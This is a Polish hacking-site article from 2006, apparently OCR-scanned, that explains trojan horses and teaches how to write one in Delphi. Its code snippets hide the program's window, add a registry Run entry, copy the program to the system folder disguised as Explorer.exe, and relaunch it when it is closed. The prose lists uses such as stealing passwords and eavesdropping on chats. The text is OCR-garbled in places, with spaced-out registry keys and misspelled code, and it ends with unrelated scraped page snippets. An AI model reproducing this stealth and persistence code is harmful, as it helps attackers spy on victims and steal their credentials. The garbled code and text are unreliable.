Podstawowe informmacje o trojanach Artykuł z HACKME bmp

Podstawowe informmacje o trojanach Artykuł z HACKME bmp



Budowa Trojanów oraz ich działanie


Konstrukcja i zasady działania trojanów


Postaram się tu przekazać jak najwięcej wiedzy o budowie trojanów i ich działaniu. SPIS TREŚCI:

1.    Co to jest trojan

2.    Co robi trojan po uruchomieniu w systemie

3.    Do czego można go wykorzystać

4.    Podstawowa budowa trojana

5.    Przykładowy trojan

6.    Łączenie się "Klienta" z "Serwerem"

7.    Użycie trojanów

Ad.l

Koń trojański jest to pozornie nieszkodliwy program, który umożliwia przejęcie kontroli nad komputerem bez wiedzy właściciela. Można się nim zarazić na wiele sposobów, oglądając stronę www, otwierając plik od kolegi, ściągając "patch" do gry... Trojany w przeciwieństwie do wirusów nie powielają swojego kodu (przeważnie), doklejając się do różnych plików. Jest to o tyle dobre, że gdy odkryjemy trojana w swoim systemie łatwo go usunąć.

Trojany często wykorzystywane sa. przez administratorów systemów jako "Narzędzia zdalnej administracji" pozwalające im oszczędzić czas i ułatwić pracę ("Jak podają statystyki, ponad 30% wszystkich włamań do sieci Pentagonu, było przeprowadzonych właśnie przy użyciu tych "luk" pozostawionych przez administratorów).


Ad.2

Po uruchomieniu trojan kopiuje się przeważnie do katalogu z systemem operacyjnym (np. Windows), co powoduje że nawet po usunięciu pierwotnej kopii trojan nadal działa. Następnym krokiem jest spowodowanie aby trojan odpalał się przy uruchomieniu systemu. Najczęściej trojan dokonuje wpisu w rejestrze, w którymś z tych miejsc:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\R.u

nServices]

[ H KEY_LO C A L_M A C HIN E\S O FT W A R E\M i ero s oft\W i n d o w s\C u rre ntV e rs i o n \R u n ]

[ H K E Y_C U R R E NT_U S E R\S O FT W A R E\M i cr o s oft\ W i n d o w s\C u r r e nt V e r s i o n\R u n ]

Lub jak na przykład cafeini, jeżeli to możliwe dokleja swój kod do jakiegoś pliku, który używa system (w przypadku cafeini-ego jest to rundll32.exe)

Po tych czynnościach trojan otwiera ustalony wcześniej port na komputerze ofiary i rozpoczyna na nim nasłuch w oczekiwaniu na komendy.

Najczęściej trojany maja wbudowane następujące funkcje:

-    przesyłanie informacji systemowych: nazwy komputera, nazwy użytkownika, typu procesora, wielkości pamięci, wersji Windows, zainstalowanych sterowników, etc.;

-    wyświetlanie zawartości dysków;

-    odszukiwanie określonych plików, a także ich wysyłanie, pobieranie, kopiowanie, usuwanie oraz uruchamianie;

-    tworzenie i kasowanie katalogów;

-    wyświetlanie i kończenie aktywnych procesów;

-    udostępnianie rejestrów systemowych;

-    pobieranie haseł znajdujących się w pamięci podręcznej;

-    przechwytywanie znaków wprowadzanych przez użytkownika z klawiatury przyłączanie się do zasobów sieciowych;

-    przechwytywanie transmitowanych informacji;

-    przekierowywanie połączeń;

-    uruchomienie prostego serwera HTTP dającego dostęp do komputera przez przeglądarkę; zawieszanie komputera;

-    wyświetlanie okien z dowolnymi komunikatami;

-    odgrywanie plików dźwiękowych;

-    Zaawansowane konie trojańskie mogą być rozszerzane o dodatkowe funkcje poprzez zastosowanie plug-inów. Takie wtyczki mogą być rozprowadzane wraz z serwerem lub przesyłane do serwera i tam instalowane.

Ad.3

Najczęściej wykorzystuje się trojany do uprzykrzenia komuś życia i pokazania jaki to z nas "hakier".

Jednak istnieją także inne sposoby wykorzystania tego typu oprogramowania np.:

-    podsłuch rozmów gg, czata innych

-    uzyskiwanie haseł, loginów itp... (w ogóle wszystkich poufnych informacji)

-    kontrola np. w szkole ucznia, czy nie robi czegoś niedozwolonego

-    możliwość wykorzystania komputera jako narzędzia do ataku na jakiś serwer (ale w tym przypadku pojawia się taki termin jak robak)

-    programu typu NetOP pozwalające na przykład na wyświetlanie prezentacji komputerowej na wszystkich komputerach jednocześnie z 1 stanowiska

-    kontrola pracowników w firmie (np. Oko szefa)

-    wykorzystanie przez administratorów (patrz Ad.l)

-    itd. itp.....

Ad.4

Trojan składa się przeważnie z 4 części:

1.    Część odpowiedzialna za ukrywanie jego obecności w systemie

Chodzi tu o to, że użytkownik nie wie, że załapał trojana na pasku startu (listwie) nie widać paska programu, na liście menadżera zadań nie widnieje nasz program, po uruchomieniu nic się nie pokazuje ... (Czasami jakaś informacja o błędzie)

2.    Część odpowiedzialna za uruchamianie trojana przy starcie systemu

Czyli dopisywanie odpowiednich linijek do rejestru, kopiowanie kodu do jakiegoś pliku itp.

3.    Część ochronna trojana

Kiedy użytkownik (mniej zaawansowany) odkryje obecność trojana w komputerze ten system zapobiegnie usunięciu programu z komputera.

Głównie jest to osiągane przez to, że podczas działania trojan stale dopisuje linijkę uruchamiającą go przy starcie, przy wyłączeniu samoistnie się włącza...

4.    Część, w której zawarte są wszystkie funkcje trojana oraz elementy pozwalaja.ee połączyć się z zainfekowanym komputerem

Innymi słowy funkcje zamieszczone w Ad.2 oraz system bindujący się na jakimś porcie (otwierający dany port) i nasłuchujący zewnętrznych komend, które program interpretuje i wywołuje odpowiednią funkcję.


Ad.5

Trojany oczywiście można pisać w każdym języku programowania, lecz Delphi udostępnia wiele gotowych rozwiązań, (jak na przykład system komunikacji pomiędzy komputerami, który bardzo skraca czas tworzenia trojana) Oczywiście najlepiej pisać tego typu programy w asemblerze, gdyż jest to język podstawowy, na którym opierają się pozostałe. Program napisany w asm jest krótszy, ponieważ nie zawiera zbędnych rzeczy ale w tym przypadku nasz kod źródłowy miałby kilkanaście albo i więcej stron. Podczas gdy w Delphi zapiszemy jedynie kilkanaście linijek :).

Ten artykuł pokazuje jak napisać takiego trojanika: [ www ]

Ja dodałbym do tego kilka rzeczy:

1. Ukrywanie:


a.

Żeby nasz program nie wyświetlał się na pasku startu (listwa) w menu Project klikamy na View source i zamieniamy wszystko co tam jest na to:


Kod:

program Projectl;

uses

Forms,

Unitl in 'Unitl.pas' {Forml},

Windows;

{$R *.RES}

var ExtendedStyle:integer; begin

Application.Initialize;

ExtendedStyle:=GetWindowLong(Application.Handle, GWL_EXSTYLE); SetWindowLong(Application.Handle,GWL_EXSTYLE,ExtendedStyle or W S_E X_T O O L WIN D O W and not WS_EX_APPWINDOW);

Application.CreateForrn(TForrnl, Forml);

Application.Run; end.


b.

Chcemy aby forma miała 0 pixeIi szerokości i wysokości:

Klikamy na Forml i zmieniamy zakładkę na Events. Tam szukamy OnCreate i klikamy dwukrotnie na białe pole po lewej. Pojawił się nam kod procedury, gdzie wpisujemy:


Kod:

forrnl.Width:=0; forml.Height:=0;


2. Uruchamianie przy starcie systemu:

w źródle programu szukamy linijki, w której jest napisane "var". Pod nią piszemy:


Kod:

var

Forml: TForml; Reg:Tregistry; {<--- to} irnplernentation


w źródle programu szukamy linijki, w której jest napisane "uses". Pod nią piszemy:


Kod:

uses

Windows, Messages, SysUtils, Classes, {>>>} Registry {<<< (dopisujemy tylko to !!!)} , Graphics, Controls, Forms, Dialogs,

ScktComp;


Klikamy na Forml i zmieniamy zakładkę na Events. Tam szukamy OnCreate i klikamy dwukrotnie na białe pole po lewej. Pojawił się nam kod

procedury, gdzie wpisujemy:


Kod:

{Wpis do rejestru}

Reg := TRegistry .Create; try

Reg.RootKey := HKEY_LOCAL_MACHINE;

Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);

Reg.WriteString('sheir, 'c:\windows\systern\Explorer.exe');

finally

Reg.Free;

end;

{Kopiowanie plików}

copyfile( PChar(pararnstr(0)), 'c:\windows\system\Explorer.exe', true);


3. Zapobieganie wyłączeniu

Tutaj chodzi o wstawienie tirnera i ciągłym dokonywaniu wpisu w rejestrze i kopiowaniu pliku do katalogu Windows (to jest powtórzenie tego co pisałem, więc tego nie napiszę)

+

Przy wyłączeniu trojana włączanie go poprzez funkcję:

Klikamy na Forml i zmieniamy zakładkę na Events. Tam szukamy OnDestroy i klikamy dwukrotnie na białe pole po lewej. Pojawił się nam kod procedury, gdzie wpisujemy:


Kod:

winexec(pchar(paramstr(0)), 1);


4. Funkcje trojana i mechanizm łączenia się komputerów są opisane w artykule:


Ad.6

Łączenie klienta z serwerem omówię na przykładzie 2 komputerów znajdujących się w tej samej sieci lokalnej:

A więc mamy 2 komputery:

1.    Komputer "A" IP*: 10.0.0.1 - zainstalowany serwer (plik trojana dający kontrole nad komputerem)

2.    Komputer "B" - uruchomiony klient (program pozwalający połączyć się z serwerem, czasami wystarczy jedynie program tyu telnet bądź inny podobny)

I teraz nasz programik otwiera na komputerze A przykładowo port 7334. Komputer B chce połączyć się z komputerem A, więc klient próbuje używając protokołu TCP/IP (czasami inne np. UDP - skrajne przypadki) połączyć się z komputerem A. Możliwe jest to dzięki temu, że znamy identyfikator sieciowy komputera A, czyli jego adres IP oraz otwarty port. Spytacie skąd komputer wie, z którym komputerem ma się połączyć. Ano wie to stąd, że gdy włączamy komputer z zainstalowanym oprogramowaniem sieciowym, który podłączony jest do sieci, nasz komputer uzyskuje informacje o innych komputerach w sieci i dzięki temu oba komputery "widzą się" wzajemnie, (znają swoje adresy IP, i inne dane np. nazwa itp. 2 Internetem sprawa już się komplikuje i nie będę tu o tym pisał.)

Nawiązaliśmy połączenie, więc możemy przystąpić do wysyłania poleceń, czyli przesyłania odpowiednich danych, które powodują po odpowiedniej interpretacji przez program wywołanie odpowiednich funkcji w trojanie...


*IP - Adres IP, adres protokołu IP. Cztery bajty określające komputer w Internecie. Każdy podłączony do sieci komputer musi mieć unikalny i niezmienny adres IP

*TCP/IP - (ang. Transrnission Control Protocol) zbiór protokołów obsługujących transmisję danych w sieci. Za pomocą TCP/IP przesyłane są dane wszystkich aplikacji komunikujących się przez sieć.

Czytaj więcej: [ www ]

*Porty protokołu (port)- to pojęcie związane z protokołem TCP-IP używanym w Internecie do rozróżniania wielu różnych usług i połączeń na serwerze. Porty protokołu są oznaczone za pomocą liczb całkowitych z zakresu od 1 do 65535.

Mam nadzieje, że komuś to się do czegoś przyda...

POZDRO

_Dodane przez dentysta999 dnia październik 02 2006 01:00:44_



Wyszukiwarka

Podobne podstrony:
skanuj0129 bmp 258 MOTYWOWANIE W ZARZĄDZANIU 258 MOTYWOWANIE W ZARZĄDZANIU Dobra komunikacja opiera
Tekst bmp B ab ci a Cz. Janczar ski Jedzie Jacek tramwajem, rozsiadł się wygodnie i patrzy, jak
CCF20090628000 (2) Gazownictwo Podstawowe własności gazów rozprowadzanych sieciami gazowymi Paliwa
Konserwowanie żywności. Niektóre artykuły spożywcze są konserwowane przez poddawanie ich działaniu
I. Mikroskop optyczny - podstawowe informacje. 1. Budowa i rozchodzenie się światła wewnątrz
scan0016 bmp Na podstawie informacji zawartych we fragmencie ulotki leku Bisphexal 10 można stwierdz
skanuj0222 bmp 2. Budowanie rynku usług medycznych 223 Podstawową cechą rynku usług medycznych w Pol
skanuj0232 bmp 2. Budowanie rynku usług medycznych 233 w ochronie zdrowia"4. Na podstawie przea
Obraz1131 Podstawy informatyki - laboratoriumMathCAD - (części) Tematyka: podstawy programu, pola t
Biocemia bmp Temat : Budowa kwasów nukleinowych i ich charakterystyczne reakcje. Ce!: Zapoznanie stu
Budowa drzewa z wykorzystaniem wskaźników PODSTAWY INFORMATYKI, Adrian Horzyk,
1.    Budowa kwasów nukleinowych - podstawowe informacje; którykolwiek podręczni
HD1 PODSTAWA INFORMACJE NA TEMAT CBłEKTCWCH BAS PANTCH ORAZ OBłEKTOWOŚa
Image2 18C 8 Układ okresowy pierwiastków 2 He Widok Podstawowe informacje Rozpowszechnienie Kalkulat

więcej podobnych podstron